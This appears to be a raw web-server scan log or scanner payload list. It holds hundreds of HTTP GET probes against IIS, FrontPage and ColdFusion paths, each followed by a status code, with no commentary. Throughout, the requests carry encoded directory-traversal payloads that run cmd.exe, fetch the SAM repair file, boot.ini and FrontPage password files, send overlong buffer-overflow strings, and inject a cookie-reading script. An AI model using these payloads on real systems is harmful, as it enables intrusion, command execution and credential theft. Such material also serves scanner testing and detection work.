GET***/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/CGImail.exe***200
GET***/_vti_bin/_vti_adm***200
GET***/_vti_bin/_vti_adm/admin.dll***200
GET***/_vti_bin/_vti_aut***200
GET***/_vti_bin/_vti_aut/author.dll***200
GET***/_vti_bin/_vti_aut/author.exe***200
GET***/_vti_bin/_vti_aut/dvwssr.dll***200
GET***/_vti_bin/_vti_aut/fp30reg.dll***200
GET***/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx***200
GET***/_vti_bin/_vti_cnf/***200
GET***/_vti_bin/admin.pl***200
GET***/_vti_bin/cfgwiz.exe***200
GET***/_vti_bin/cgimail.exe***200
GET***/_vti_bin/cgitest.exe***200
GET***/_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/contents.htm***200
GET***/_vti_bin/fpadmin.htm***200
GET***/_vti_bin/fpcount.exe***200
GET***/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1***200
GET***/_vti_bin/fpexe***200
GET***/_vti_bin/fpremadm.exe***200
GET***/_vti_bin/fpsrvadm.exe***200
GET***/_vti_bin/get32.exe***200
GET***/_vti_bin/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/minimal.exe***200
GET***/_vti_bin/perl.exe***200
GET***/_vti_bin/ppdscgi.exe***200
GET***/_vti_bin/redir.exe***200
GET***/_vti_bin/rguest.exe***200
GET***/_vti_bin/root.exe?/c%20dir***200
GET***/_vti_bin/scripts/Fpadmcgi.exe***200
GET***/_vti_bin/shtml.dll***200
GET***/_vti_bin/shtml.dll/_vti_rpc***200
GET***/_vti_bin/shtml.dll/nosuch.htm***200
GET***/_vti_bin/shtml.exe***200
GET***/_vti_bin/shtml.exe/_vti_rpc***200
GET***/_vti_bin/shtml.exe/com1.***200
GET***/_vti_bin/shtml.exe/com1.asp***200
GET***/_vti_bin/shtml.exe/junk_nonexistant.exe***200
GET***/_vti_bin/shtml.exe/mailslot.htm***200
GET***/_vti_bin/shtml.exe/pipe.htm***200
GET***/_vti_bin/shtml.exe/unc.htm***200
GET***/_vti_bin/testcgi.exe***200
GET***/_vti_bin/visitor.exe***200
GET***/_vti_bin/webbbs.exe***200
GET***/_vti_bin/ws_ftp.ini***200
GET***/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/_vti_cnf/***200
GET***/_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_cnf/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_inf.html***200
GET***/_vti_log***200
GET***/_vti_log/_vti_cnf/***200
GET***/_vti_pvt***200
GET***/_vti_pvt/***200
GET***/_vti_pvt/access.cnf***200
GET***/_vti_pvt/admin.pwd***200
GET***/_vti_pvt/administrator.pwd***200
GET***/_vti_pvt/administrators.pwd***200
GET***/_vti_pvt/author.log***200
GET***/_vti_pvt/authors.pwd***200
GET***/_vti_pvt/doctodep.btr***200
GET***/_vti_pvt/linkinfo.cnf***200
GET***/_vti_pvt/service.cnf***200
GET***/_vti_pvt/service.grp***200
GET***/_vti_pvt/service.pwd***200
GET***/_vti_pvt/service.stp***200
GET***/_vti_pvt/services.cnf***200
GET***/_vti_pvt/shtml.dll***200
GET***/_vti_pvt/shtml.exe***200
GET***/_vti_pvt/svacl.cnf***200
GET***/_vti_pvt/svcacl.cnf***200
GET***/_vti_pvt/users.pwd***200
GET***/_vti_pvt/writeto.cnf***200
GET***/_vti_pwd/administrators.pwd***200
GET***/_vti_txt***200
GET***/_vti_txt/***200
GET***/_vti_txt/_vti_cnf/***200
GET***/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini***200
GET***/a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._***200
GET***/a.asp/..%%35%63../..%%35%63../winnt/win.ini***200
GET***/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._***200
GET***/a.asp/..%%35c../..%%35c../winnt/win.ini***200
GET***/a.asp/..%%35c../..%%35c..\winnt\repair\sam._***200
GET***/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini***200
GET***/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam._***200
GET***/a.asp/..%255c../..%255c../winnt/win.ini***200
GET***/a.asp/..%255c../..%255c..\winnt\repair\sam._***200
GET***/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini***200
GET***/a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._***200
GET***/a.asp/..%c0%af../..%c0%af../winnt/win.ini***200
GET***/a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._***200
GET***/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini***200
GET***/a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._***200
GET***/a.asp/..%c1%9c../..%c1%9c../winnt/win.ini***200
GET***/a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._***200
GET***/a.asp/..%u00255c../..%u00255c../winnt/win.ini***200
GET***/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._***200
GET***/a.asp/..%u002f../..%u002f../winnt/win.ini***200
GET***/a.asp/..%u002f../..%u002f..\winnt\repair\sam._***200
GET***/a.asp/..%u005c../..%u005c../winnt/win.ini***200
GET***/a.asp/..%u005c../..%u005c..\winnt\repair\sam._***200
GET***/a.asp/..\../..\../winnt/repair/sam***200
GET***/a.jsp//..//..//..//..//..//../winnt/win.ini***200
GET***/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa***500
GET***/abczxv.htw***200
GET***/accept/***200
GET***/access-log***200
GET***/access.log***200
GET***/admcgi/contents.htm***200
GET***/admcgi/scripts/Fpadmcgi.exe***200
GET***/admentor/adminadmin.asp***200
GET***/admin-serv/config/admpw***200
GET***/admin/adminproc.asp***200
GET***/admin/datasource.asp***200
GET***/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\><script>alert(document.cookie)</script>?tab1=TabsWebServer%26__SAPageKey=5742D5874845934A134CD05F39C63 240%26R=0.6756681557204625&R=0.9895845379540951&__SAPageKey=5742D5874845934A134CD05F39C63240***200
GET***/admisapi/***200
GET***/admisapi/fpadmin.htm***200
GET***/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/config/site.csc***200
GET***/advworks/equipment/catalog_type.asp***200
GET***/app.cfm***200
GET***/asp/SQLQHit.asp***200
GET***/asp/sqlqhit.asp***200
GET***/autoexec.bat***200
GET***/b2/b2-include/b2edit.showposts.php***200
GET***/backup/***200
GET***/bdir.htr***200
GET***/bin/***200
GET***/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/CGImail.exe***200
GET***/bin/_vti_cnf/***200
GET***/bin/admin.pl***200
GET***/bin/cfgwiz.exe***200
GET***/bin/cgimail.exe***200
GET***/bin/cgitest.exe***200
GET***/bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/common/user_update_admin.pl***200
GET***/bin/common/user_update_passwd.pl***200
GET***/bin/contents.htm***200
GET***/bin/fpadmin.htm***200
GET***/bin/fpremadm.exe***200
GET***/bin/fpsrvadm.exe***200
GET***/bin/get32.exe***200
GET***/bin/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/minimal.exe***200
GET***/bin/perl.exe***200
GET***/bin/ppdscgi.exe***200
GET***/bin/redir.exe***200
GET***/bin/rguest.exe***200
GET***/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/Fpadmcgi.exe***200
GET***/bin/scripts/openvendor/gnete/RetrievePNBody.asp***200
GET***/bin/testcgi.exe***200
GET***/bin/visitor.exe***200
GET***/bin/webbbs.exe***200
GET***/bin/ws_ftp.ini***200
GET***/blahb.ida***200
GET***/blahb.idq***200
GET***/c/winnt/system32/cmd.exe?/c+dir+/OG***200
GET***/carbo.dll***200
GET***/catalog.nsf***200
GET***/catalog.nsf/***200
GET***/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cfappman/***200
GET***/cfappman/index.cfm***200
GET***/cfcache.map***200
GET***/cfdocs/***200
GET***/cfdocs/cfcache.map***200
GET***/cfdocs/cfmlsyntaxcheck.cfm***200
GET***/cfdocs/exampleapp/***200
GET***/cfdocs/exampleapp/docs/sourcewindow.cfm***200
GET***/cfdocs/exampleapp/email/application.cfm***200
GET***/cfdocs/exampleapp/email/getfile.cfm***200
GET***/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini***200
GET***/cfdocs/exampleapp/publish/admin/addcontent.cfm***200
GET***/cfdocs/exampleapp/publish/admin/application.cfm***200
GET***/cfdocs/examples/***200
GET***/cfdocs/examples/cvbeans/beaninfo.cfm***200
GET***/cfdocs/examples/httpclient/mainframeset.cfm***200
GET***/cfdocs/examples/parks/detail.cfm***200
GET***/cfdocs/expelval/displayopenedfile.cfm***200
GET***/cfdocs/expelval/exprcalc.cfm***200
GET***/cfdocs/expelval/openfile.cfm***200
GET***/cfdocs/expelval/sendmail.cfm***200
GET***/cfdocs/expeval/ExprCalc.cfm***200
